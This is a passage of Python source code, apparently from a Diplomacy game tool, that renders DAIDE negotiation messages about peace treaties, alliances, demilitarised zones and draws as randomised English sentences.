Creates an English expression about the confusion in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.details is None:
return super().formenglish()
self.english = self.details.formenglish()
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = 'I did not understand your message.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'HUH (' + self.details.formDAIDE() + ')'
class PressIgnore(PressMessage):
""" The game-related content of an ignoring. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'BWX'
self.details = randomFactory(utterance, self, 'PRP')
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the ignoring in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if random.choice([True,False]):
self.english = ''
else:
self.english = helpers.powerdict[self.utterance.frompower]['Objective'] + ' ignores you.'
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = self.formenglish()
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'BWX (' + self.details.formDAIDE() + ')'
class PressPeace(PressMessage):
""" The game-related content of a peace treaty. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'PCE'
if random.choice([True, True, False]):
self.allies = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
else:
self.allies = random.sample(helpers.powerlist, random.randint(2, 4))
elif len(thelists) == 2:
self.operator = thelists[0]
self.allies = thelists[1]
def formenglish(self): # type () -> str
"""
Creates an English expression about the ignoring in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.container.operator == 'PRP':
# (PRP (PCE
if self.container.container is None:
if random.choice([True, False]):
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
' a ' + random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
else:
self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (YES (PRP (PCE
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with', 'would appreciate']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
# (REJ (PRP (PCE
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
# (CCL (PRP (PCE
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
# (HUH (PRP (PCE
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your peace proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (PCE
if self.container.container.container is None:
self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['break', 'cancel', 'annul']) + ' ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (YES (PRP (NOT (PCE
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['break', 'cancel', 'annul']) + ' ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (REJ (PRP (NOT (PCE
elif self.container.container.container.operator == 'REJ':
if random.choice([True, False]):
self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
' should ' + random.choice(['break', 'cancel', 'annul']) + ' ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
else:
self.english = 'No, ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['should not', 'cannot', 'ought not']) + ' ' + random.choice(['break', 'cancel', 'annul']) + ' ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (CCL (PRP (NOT (PCE
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['break', 'cancel', 'annul']) + ' ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (HUH (PRP (NOT (PCE
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a peace treaty.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (PCE
if self.container.container.container is None:
self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are not in a current', 'do not have a current', 'are not in an active', 'do not have an active', 'are not in a', 'do not have a']) + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (HUH (FCT (NOT (PCE
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a peace treaty.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (PCE
if self.container.container.container is None:
self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' not ' + \
random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (YES (PRP (NAR (PCE
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' not ' + \
random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (REJ (PRP (NAR (PCE
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
' should in fact ' + random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (CCL (PRP (NAR (PCE
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
' avoid ' + random.choice(['forming', 'signing', 'agreeing to', 'establishing']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (HUH (PRP (NAR (PCE
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a peace treaty.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (PCE
if self.container.container.container is None:
self.english = 'It is unclear if ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in a', 'have a']) + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (HUH (FCT (NAR (PCE
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a peace treaty.'
elif self.container.operator == 'FCT':
# (FCT (PCE
if self.container.container is None:
self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in a', 'have a']) + ' ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
# (HUH (FCT (PCE
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a peace treaty.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement about this peace deal, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'PCE (' + ' '.join(self.allies) + ')'
class PressAlliance(PressMessage):
""" The game-related content of an alliance. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'ALY'
if random.choice([True, True, False]):
self.allies = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
opplist = [curpower for curpower in helpers.powerlist if curpower not in self.allies]
self.opponents = random.sample(opplist, random.randint(1, min(3, len(opplist))))
else:
self.allies = random.sample(helpers.powerlist, random.randint(2, 3))
opplist = [curpower for curpower in helpers.powerlist if curpower not in self.allies and curpower != utterance.frompower]
self.opponents = random.sample(opplist, random.randint(1, min(3, len(opplist))))
elif len(thelists) == 4:
self.operator = thelists[0]
self.allies = thelists[1]
self.opponents = thelists[3]
def formenglish(self): # type () -> str
"""
Creates an English expression about the alliance in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.container.operator == 'PRP':
# (PRP (ALY
if self.container.container is None:
if random.choice([True, False]):
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
' ' + random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
else:
self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['form', 'sign', 'agree to', 'establish']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (YES (PRP (ALY
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with', 'would appreciate']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (REJ (PRP (ALY
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (CCL (PRP (ALY
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (HUH (PRP (ALY
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your alliance proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (ALY
if self.container.container.container is None:
self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' not ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (YES (PRP (NOT (ALY
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (REJ (PRP (NOT (ALY
elif self.container.container.container.operator == 'REJ':
if random.choice([True, False]):
self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
else:
self.english = 'No, ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['should be free to', 'should not be stopped from', 'should not be prevented from']) + ' ' + \
random.choice(['forming', 'signing', 'agreeing to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (CCL (PRP (NOT (ALY
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (HUH (PRP (NOT (ALY
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about an alliance.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (ALY
if self.container.container.container is None:
self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are not in', 'do not have']) + ' ' + \
random.choice(['a current', 'an active', 'a']) + ' ' + \
random.choice(['alliance', 'joint military operation', 'military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
self.english = self.english.replace(' a alliance', ' an alliance')
# (HUH (FCT (NOT (ALY
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about an alliance.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (ALY
if self.container.container.container is None:
self.english = 'I ' + random.choice(['doubt', 'don\'t think', 'do not think']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (YES (PRP (NAR (ALY
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (REJ (PRP (NAR (ALY
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
' should in fact be able to ' + random.choice(['form', 'sign', 'agree to', 'establish']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (CCL (PRP (NAR (ALY
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (HUH (PRP (NAR (ALY
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about an alliance.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (ALY
if self.container.container.container is None:
self.english = 'It is unclear if ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in', 'have']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (HUH (FCT (NAR (ALY
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about an alliance.'
elif self.container.operator == 'FCT':
# (FCT (ALY
if self.container.container is None:
self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in', 'have']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
# (HUH (FCT (ALY
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about an alliance.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement about this alliance, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['form', 'sign', 'agree to', 'establish']) + ' ' + \
random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'ALY (' + ' '.join(self.allies) + ') VSS (' + ' '.join(self.opponents) + ')'
class PressDMZ(PressMessage):
""" The game-related content of a DMZ. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'DMZ'
if random.choice([True, True, False]):
self.powers = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
else:
self.powers = random.sample(helpers.powerlist, random.randint(1, 3))
self.provinces = random.sample(helpers.provincelist, random.randint(1, 3))
elif len(thelists) == 3:
self.operator = thelists[0]
self.powers = thelists[1]
self.provinces = thelists[2]
def formenglish(self): # type () -> str
"""
Creates an English expression about the DMZ in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
powersgloss = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers)
provincesgloss = helpers.listOfProvinces(self.provinces)
if self.container.operator == 'PRP':
# (PRP (DMZ
if self.container.container is None:
if 'you ' in powersgloss.lower() and 'and me' in powersgloss.lower():
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
' we ' + random.choice(['stay out of', 'create a DMZ in', 'create a demilitarized zone in', 'keep out of']) + ' ' + \
provincesgloss + '.'
else:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' that ' + \
powersgloss + ' ' + random.choice(['stay out of', 'create a DMZ in', 'create a demilitarized zone', 'keep out of']) + ' ' + \
provincesgloss + '.'
# (YES (PRP (DMZ
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' ' + \
random.choice(['a DMZ in', 'a demilitarized zone in', 'keeping out of', 'staying out of']) + ' ' + \
provincesgloss + ', covering ' + powersgloss + '.'
# (REJ (PRP (DMZ
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' ' + \
random.choice(['a DMZ in', 'a demilitarized zone in', 'keeping out of', 'staying out of']) + ' ' + \
provincesgloss + '.'
# (CCL (PRP (DMZ
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
random.choice(['a DMZ in', 'a demilitarized zone in']) + ' ' + \
provincesgloss + '.'
# (HUH (PRP (DMZ
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your DMZ proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (DMZ
if self.container.container.container is None:
if random.choice([True, False]):
self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' that ' + \
powersgloss + ' have free movement into and through ' + \
provincesgloss + '.'
else:
self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' that no ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' exist in ' + \
provincesgloss + '.'
# (YES (PRP (NOT (DMZ
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
powersgloss + ' have free movement into and through ' + \
provincesgloss + '.'
# (REJ (PRP (NOT (DMZ
elif self.container.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['disagree with', 'reject']) + ' free movement into and through ' + \
provincesgloss + ' for ' + powersgloss + '.'
# (CCL (PRP (NOT (DMZ
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
provincesgloss + ' not enjoy a ' + random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + \
' with respect to ' + powersgloss + '.'
# (HUH (PRP (NOT (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a DMZ.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (DMZ
if self.container.container.container is None:
self.english = powersgloss + ' ' + \
random.choice(['are not in', 'do not respect', 'do not have']) + ' ' + \
random.choice(['a current', 'an active', 'a']) + ' ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (FCT (NOT (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a DMZ.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (DMZ
if self.container.container.container is None:
self.english = 'I ' + random.choice(['doubt', 'don\'t think', 'do not think']) + ' that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should ' + \
random.choice(['form', 'sign', 'agree to']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (YES (PRP (NAR (DMZ
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (REJ (PRP (NAR (DMZ
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
' should in fact be able to ' + random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (CCL (PRP (NAR (DMZ
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (PRP (NAR (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a DMZ.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (DMZ
if self.container.container.container is None:
self.english = 'It is unclear if ' + helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in', 'have']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (FCT (NAR (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a DMZ.'
elif self.container.operator == 'FCT':
# (FCT (DMZ
if self.container.container is None:
self.english = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in', 'have']) + ' ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (FCT (DMZ
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a DMZ.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the DMZ in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' form a DMZ in ' + helpers.listOfProvinces(self.provinces) + '.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'DMZ (' + ' '.join(self.powers) + ') (' + ' '.join(self.provinces) + ')'
class PressDraw(PressMessage):
""" The game-related content of a draw. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'DRW'
if random.choice([True, True, False]):
self.powers = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
else:
self.powers = None
self.provinces = random.sample(helpers.provincelist, random.randint(1, 3))
else:
self.operator = thelists[0]
if len(thelists) > 1:
self.powers = thelists[1]
else:
